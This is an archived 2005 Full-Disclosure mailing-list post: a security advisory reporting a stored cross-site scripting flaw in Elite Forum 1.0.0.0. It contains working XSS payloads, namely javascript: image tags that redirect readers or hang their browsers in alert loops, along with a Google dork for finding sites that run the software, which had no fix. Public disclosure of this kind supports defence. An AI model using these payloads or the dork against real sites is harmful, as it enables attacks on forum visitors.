lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue Nov  1 09:46:23 2005
From: h4cky0u.org at gmail.com (h4cky0u)
Subject: HYSA-2005-009 Elite Forum 1.0.0.0 XSS
	Vulnerability

------------------------------------------------------
HYSA-2005-009 h4cky0u.org <http://h4cky0u.org> Advisory 009
------------------------------------------------------
Date - Tue Nov 1 2005


TITLE:
======

Elite Forum 1.0.0.0 <http://1.0.0.0> XSS Vulnerability


SEVERITY:
=========

Medium


SOFTWARE:
=========

Elite Forum 1.0.0.0 <http://1.0.0.0>


INFO:
=====

Elite Forum is a fierce competitor entering the world of forum systems.
Unlike many other choices, Elite Forum does not

require the hassle of a MySQL database. Elite Forum is one of the best and
is packed full of features, including the

following: No MySQL database required, Very easy installation, Support for
both user registration and guests, Private

Messaging System, Forum can be locked so registration is required, User,
forum and topic statistics, Fast and easy to use

search system, Ability to view who is currently browsing the forum, Sticky
Topics (Announcements), Full member list,

Unlimited users, topics and posts, Member Profiles/Stats, Multiple page
support (both topics and posts user definable),

Selectable time offset, Ability to auto check for updates/patches, Clean and
streamlined design, Smiley Support, BB Code and

auto url support, Topic status icons, Member and Guest user levels, Members
can edit or delete their posts, Secure accounts,

Add or remove admins via administrator panel, Admins can edit/delete any
post or topic.

Support Website :
www.all-interviews.com/firestorm/?act=eliteforum<http://www.all-interviews.com/firestorm/?act=eliteforum>(Down
at the time of Bug Discovery)


BUG DESCRIPTION:
================

The system is vulnerable to Cross Site Scripting attacks. This issue is due
to a failure of the application to properly

sanitize user-supplied input.


POC:
====

First find a forum running the Elite Forum package. Then click on a topic
and then Post Reply. In the message box add any of

the following codes. Here are some examples:

<img src="javascript:void(window.location=('imagelink'))"> - Replace the
imagelink with the link to the image you want to

redirect the users viewing the topic containing this code.

<img src="javascript:a=100;while(a>=0){alert(a);a--}">

<img src="javascript:a=1;while(a>0){alert("sup?")">


VENDOR STATUS:
==============

The support site is down and no vendor contact could be found.


FIX:
====

No fix available as of date.


GOOGLEDORK:
===========

"Powered by Elite Forum"


CREDITS:
========

This vulnerability was discovered and researched by
Gladiator.KHF(handle/username - gladiator) of h4cky0u Security Forums.


mail : gleden123 at Yahoo dot Com

web : http://www.h4cky0u.org


ORIGINAL ADVISORY:
==================

http://www.h4cky0u.org/advisories/HYSA-2005-009-elite-forum.txt

--
http://www.h4cky0u.org
(In)Security at its best...
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051101/c4a091e8/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ